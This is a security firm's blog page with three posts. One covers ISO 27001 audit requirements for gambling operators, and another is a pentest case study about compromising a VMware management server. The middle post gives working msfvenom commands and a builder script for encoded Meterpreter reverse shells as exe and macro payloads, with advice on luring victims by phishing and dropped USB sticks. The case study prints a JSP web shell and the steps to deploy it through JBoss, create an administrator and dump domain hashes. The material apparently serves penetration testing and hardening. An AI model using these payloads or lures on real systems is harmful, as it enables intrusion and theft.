Information Security Blog
Gambling Commission ISO 27001 Security Requirements and Penetration Testing
Posted 30/01/2012 17:38 by Bil
The specific subset focuses on access control, communications and operations, and software development, rather than all of the sections; for example, there is no specific requirement for business continuity or compliance.
ISO 27001 as a whole does not specifically state that penetration testing is a requirement for certification, whether it is external, internal or application penetration testing. Penetration testing is stated in the ISO 27002 guidance in 15.2.2 for technical compliance checking, however this is only guidance. You can also consider penetration testing, especially application penetration testing, to meet the requirements of clause A.10.9.1 electronic commerce; a penetration test can certainly help you determine whether a web application is protected from fraudulent activity or unauthorized disclosure.
For a full information security management system based on all of the requirements of ISO 27001, a certification auditor would likely require a penetration test if there were significant network or application assets exposed to the Internet, or if the business was largely based on the provision of online services. Penetration testing may already be required for compliance reasons, such as PCI DSS, which requires annual penetration tests. The risk assessment should determine whether assets that may require testing are significant, and whether there is an unacceptable risk.
For the Gambling Commission specific clauses of ISO 27001, there is no clause A.15.2.2 for technical compliance checking, only A.10.9.1 electronic commerce. Providing online services is a key part of remote gambling, and it is very likely that these web applications would be a target for fraud and unauthorized access to personal information. An ISO 27001 auditor should interview developers, review the application design and sample application code, and should also review a penetration test report that demonstrates that a thorough manual assessment of the web application has been carried out.
In conclusion, a penetration test of the system in scope should be a requirement for the Gambling Commission ISO 27001 annual audit.
Please note that Dionach offers annual Gambling Commission ISO 27001 audits.
| Share: | Tweet |
Configuring Metasploit for Client Side Attacks
Posted 22/11/2011 12:06 by Michele
First off it is common sense to leave a session in listening mode and to log everything. The best way to achieve that is by using both a screen session and the spool command as shown below:
# screen
msf> spool mylog.logMetasploit is not too verbose by default so it’s useful to turn on some debug settings:
msf> set ConsoleLogging true
msf> set LogLevel 5
msf> set SessionLogging true
msf> set TimestampOutput trueAlso it’s convenient to know what is going on and when. A good trick is to edit the Metasploit prompt as shown below:
msf> set PROMPT %T S:%S J:%JThe output will show you the current data, sessions and jobs. An example is shown below:
2011-11-03 16:52:56 +0000 S:5 J:4 >Obviously you can customize your prompt as you desire. The full list of the options is listed below:
- %D = Current local director
- %H = Host name
- %J = Current number of jobs running
- %L = Local IP
- %S = Currently number of sessions open
- %T = Time stamp
- %U = Username
Additionally I suggest setting the option ExitOnSession to false as shown below:
msf> set ExitOnSession falseIn this way you will be still in listening mode even if a closed meterpreter connection occurs. Moreover, you can create a file called in your .msf4 directory (.msf4/msfconsole.rc) in order to set up the configurations every time you start the msfconsole.
After the box is ready we should think about a good strategy to achieve a successful client side attack. Often you don’t know much about the customer’s network. Sometimes you aren’t sure if some ports are really filtered or closed. In this kind of situation the best approach is to attempt as much as you can. The idea is to create a single exe file that it is going to establish several connections on different ports. This can be done by msfvenom as shown below:
msfvenom -p windows/meterpreter/reverse_tcp -f raw -e x86/shikata_ga_nai LHOST=192.168.91.135 LPORT=80 exitfunc=thread > /tmp/msf.raw
msfvenom -p windows/meterpreter/reverse_tcp -f raw -e x86/shikata_ga_nai LHOST=192.168.91.135 LPORT=443 exitfunc=thread -c /tmp/msf.raw > /tmp/msf1.raw
msfvenom -p windows/meterpreter/reverse_tcp -f exe -e x86/shikata_ga_nai LHOST=192.168.91.135 LPORT=21 exitfunc=thread -c /tmp/msf1.raw > msf.exeThis will create a single exe file which it will establish multiple connections when it is run as shown below:
[*] Meterpreter session 37 opened (192.168.91.135:80 ->
192.168.91.129:1478) at 2011-11-03 15:11:57 +0000
[*] Meterpreter session 38 opened (192.168.91.135:443 -> 192.168.91.129:1477) at 2011-11-03 15:11:57 +0000
[*] Meterpreter session 39 opened (192.168.91.135:21 -> 192.168.91.129:1476) at 2011-11-03 15:11:57 +0000Likewise you can use this feature for a VBScript attack in order to create a malicious Word document as well. You should repeat the first two steps to create the raw file and then you have to choose the VBA output in the last step as shown below:
msfvenom -p windows/meterpreter/reverse_tcp -f vba -e x86/shikata_ga_nai LHOST=192.168.91.135 LPORT=21 exitfunc=thread -c /tmp/msf1.raw > msf.vbaAs written in the file msf.vba you have to copy the macro code section in the Office macro editor and append the payload data section to the end of the document content. I suggest using blank and small characters. Also you should write something to influence the user to enable the macro such as “Please enable your macro to see this document correctly”.
Once you have prepared the files you can choose different strategies to deliver it to the target. An option can be by putting all in USB sticks and leaving them on the target desk. Alternatively you can upload these files onto a web server and then send a phishing email with the links to the malicious files. Obviously the email should influence the reader to download and execute that files. Note that file may be detected by antivirus on the client system - antivirus evasion is not the topic of this article.
Finally a little script to create the executable or VBA files automatically:
#!/bin/bash
# Simple builder
LHOST="192.168.91.135"
LPORTS="4444 5555 6666"
rm -fr /tmp/msf.raw
rm -fr /tmp/msf1.raw
echo "Building…"
echo -n "Port: `echo $LPORTS | cut -d " " -f 1`"
echo ""
msfvenom -p windows/meterpreter/reverse_tcp -f raw -e x86/shikata_ga_nai LHOST=$LHOST LPORT=`echo $LPORTS | cut -d " " -f 1` exitfunc=thread > /tmp/msf.raw
for LPORT in `echo $LPORTS`
do
echo -n "Port: $LPORT"
echo ""
msfvenom -p windows/meterpreter/reverse_tcp -f raw -e x86/shikata_ga_nai LHOST=$LHOST LPORT=$LPORT exitfunc=thread -c /tmp/msf.raw > /tmp/msf1.raw
cp /tmp/msf1.raw /tmp/msf.raw
done
# Change option –f exe to –f vba in order to create a vba file
msfvenom -p windows/meterpreter/reverse_tcp -f exe -e x86/shikata_ga_nai LHOST=$LHOST LPORT=$LPORT exitfunc=thread -c /tmp/msf1.raw > msf.exe
rm -fr /tmp/msf.raw
rm -fr /tmp/msf1.raw
echo -n "Done!"| Share: | Tweet |
Virtual Security Management
Posted 18/10/2011 09:38 by Dave
I was part of a team of penetration testers that conducted an internal penetration test for a public sector organisation earlier this year. The organisation utilised the well-known virtualisation platform VMware vSphere to host a number of their central systems, including one of their Active Directory domain controllers.
The virtualisation host management network was segregated from the internal network using a carefully constructed series of network VLANs and subnets. In order to perform management activities, a designated dual-homed administration server was configured, with access through the “Remote Desktop” protocol permitted only for members of the local “Administrators” security group. This group consisted of the built-in “Administrator” account (which was disabled) and the Active Directory “Domain Admins” security group. This server had all of the necessary tools for administration of the vSphere environment installed and configured, and the local “Administrators” group was given administrative permissions on the vSphere cluster.
A TCP port scan of the management server identified a web interface was available on port 9090, which turned out to be an unsecured installation of the JBoss JMX Console.
It was possible to upload a specially crafted file (known as a WAR file), and gain an interactive command shell on this server. Some example code is shown below:
1) Create a simple JAVA based interactive shell:
%@ page import="java.util.*,java.io.*"%>
<HTML><BODY><FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre><%
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "<BR>");
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();}}%>
</pre></BODY></HTML>2) Compile the shell file into a WAR file:
jar -cf cmd.war cmd.jsp3) Host the WAR file on a local web server.
4) Invoke the “AddUrl()” function on the JBoss DeploymentScanner MBean to transfer the WAR file to the server:
http://target:9090/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.deployment:type=DeploymentScanner,flavor=URL5) Browse to the uploaded command shell at http://target:9090/cmd/cmd.jsp
Further investigation revealed that this uploaded shell was running in the context of the local “SYSTEM” account:
http://target:9090/cmd/cmd.jsp?cmd=whoami
NT Authority\SYSTEMThis highly privileged account allowed the creation of a new user account in the local “Administrators” group which immediately inherited complete control over the vSphere cluster:
http://target:9090/cmd/cmd.jsp?cmd=net+user+dionach+*******+/add
http://target:9090/cmd/cmd.jsp?cmd=net+localgroup+administrators+dionach+/addIt was then a fairly straightforward task to take a copy of the virtualised domain controller, and then extract the password hashes of the domain accounts and crack them offline.
The lesson to take away from this is that, while virtualisation offers many benefits to an organisation, a great deal of care has to be taken to ensure that management of the virtual environment is performed in as secure a fashion as possible, and doesn’t introduce potential vulnerabilities into the network. A key part of this being to ensure that any designated management systems are fully and appropriately hardened and secured.
| Share: | Tweet |
